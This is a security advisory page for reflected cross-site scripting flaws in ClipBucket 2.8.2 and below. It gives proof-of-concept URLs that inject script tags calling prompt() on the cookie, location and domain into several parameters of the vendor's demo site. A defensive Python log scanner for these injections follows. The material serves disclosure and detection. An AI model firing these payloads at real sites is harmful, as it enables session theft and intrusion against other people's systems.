ClipBucket 2.8.2 Cross Site Scripting

2017.03.20
Credit: NoGe
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ClipBucket <= Multiple Cross-Site Scripting Vulnerabilities
# Google Dork: n/a
# Date: March 20 2017
# Exploit Author: NoGe
# Vendor Homepage: https://clipbucket.com/
# Download: https://github.com/arslancb/clipbucket/archive/4476.zip
# Version: 2.8.2, 2.8.1 and below
# Tested on: Kali Linux

# Proof of Concept (Demo Site)

https://demo.clipbucket.com/signup.php?mode=login </script>"><script>prompt(document.cookie)</script>

https://demo.clipbucket.com/search_result.php?query=NoGe&type=videos</script>"><script>prompt(document.location)</script>

https://demo.clipbucket.com/collections.php?cat=all</script>"><script>prompt(document.domain)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort

https://demo.clipbucket.com/collections.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.cookie)</script>&sorting=sort

https://demo.clipbucket.com/photos.php?cat=all</script>"><script>prompt(document.location)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort

https://demo.clipbucket.com/photos.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.domain)</script>&sorting=sort

https://demo.clipbucket.com/channels/all/All/view_all</script>"><script>prompt(document.cookie)</script>/all_time/1&sorting=sort/

https://demo.clipbucket.com/collections/all/All/most_recent</script>"><script>prompt(document.domain)</script>/all_time/1&timing=time/

Regards.

-- NoGe
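Added example, not part of NoGe's advisory or of the ClipBucket code: an access-log check for markup-breaking characters in the parameters and routes that the PoC URLs above use, including double percent-encoded values. The parameter map is read off those URLs; the log lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Reflected parameters per script, read off the advisory's PoC URLs.
AFFECTED_PARAMS = {
    "/signup.php": {"mode"}, "/search_result.php": {"type"},
    "/collections.php": {"cat", "seo_cat_name"}, "/photos.php": {"cat", "seo_cat_name"},
}
# SEO-style routes where the advisory places the markup in the path itself.
AFFECTED_ROUTES = ("/channels/", "/collections/")
# Characters needed to close an attribute or a <script> block.
BREAKOUT = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are still seen."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def flag_request(target):
    """Return the places in one request target that carry breakout characters."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in AFFECTED_PARAMS.get(parts.path, ()) and BREAKOUT.search(fully_decode(value)):
            hits.append(f"{parts.path}?{name}")
    if parts.path.startswith(AFFECTED_ROUTES) and BREAKOUT.search(fully_decode(parts.path)):
        hits.append("path:" + parts.path.split("/")[1])
    return hits

def scan(log_lines):
    """Map line number -> hits for access-log lines that match."""
    found = {}
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match and (hits := flag_request(match.group(1))):
            found[number] = hits
    return found

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE = [
    '203.0.113.7 - - [20/Mar/2017:10:00:01 +0000] "GET /collections.php?cat=all&sort=view_all&time=all_time&page=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Mar/2017:10:00:05 +0000] "GET /search_result.php?query=NoGe&type=videos%3C/script%3E%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3E HTTP/1.1" 200 4100',
    '203.0.113.9 - - [20/Mar/2017:10:00:09 +0000] "GET /photos.php?cat=all&seo_cat_name=All%253C%252Fscript%253E HTTP/1.1" 200 4300',
    '203.0.113.9 - - [20/Mar/2017:10:00:12 +0000] "GET /channels/all/All/view_all%3C/script%3E%22%3E/all_time/1 HTTP/1.1" 404 310',
]
```

Calling scan(SAMPLE) returns hits for lines 2, 3 and 4 and leaves the ordinary listing request on line 1 unflagged.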


Copyright 2018, cxsecurity.com